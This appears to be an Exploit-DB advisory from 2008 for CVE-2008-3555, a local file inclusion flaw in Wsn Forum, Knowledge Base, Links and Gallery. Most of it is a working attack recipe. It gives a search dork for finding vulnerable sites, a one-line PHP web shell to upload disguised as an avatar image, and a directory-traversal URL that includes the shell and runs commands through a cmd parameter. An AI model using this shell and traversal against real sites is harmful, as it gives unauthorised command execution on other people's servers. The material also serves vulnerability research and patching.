Multiple Wsn Products LFI Code Execution Vulnerability

2008-08-06T00:00:00
ID EDB-ID:6208
Type exploitdb
Reporter otmorozok428
Modified 2008-08-06T00:00:00

Description

Multiple Wsn Products (LFI) Code Execution Vulnerability. CVE-2008-3555. Webapps exploit for php platform

                                        
                                            Author: otmorozok428, http://forum.antichat.ru 

Products: Wsn Forum <= 4.1.43, Wsn Knowledge Base <= 4.1.36, Wsn Links <= 4.1.44, Wsn Gallery <= 4.1.30

Vendor: http://www.webmastersite.net

Googling: inurl:memberlist.php?action=profile

Code Execution Vulnerability: 

Avatar evil.jpg source: <? system($_GET['cmd']); ?>

Enter to upload: http://www.site.com/forum/profile.php?action=editprofile&id=[Your User ID]

See the avatar name at your profile.

Upload evil avatar and go to: index.php?custom=yes&TID=../../attachments/avatars/[Avatar Name]&ext=jpg&cmd=ls -al

# milw0rm.com [2008-08-06]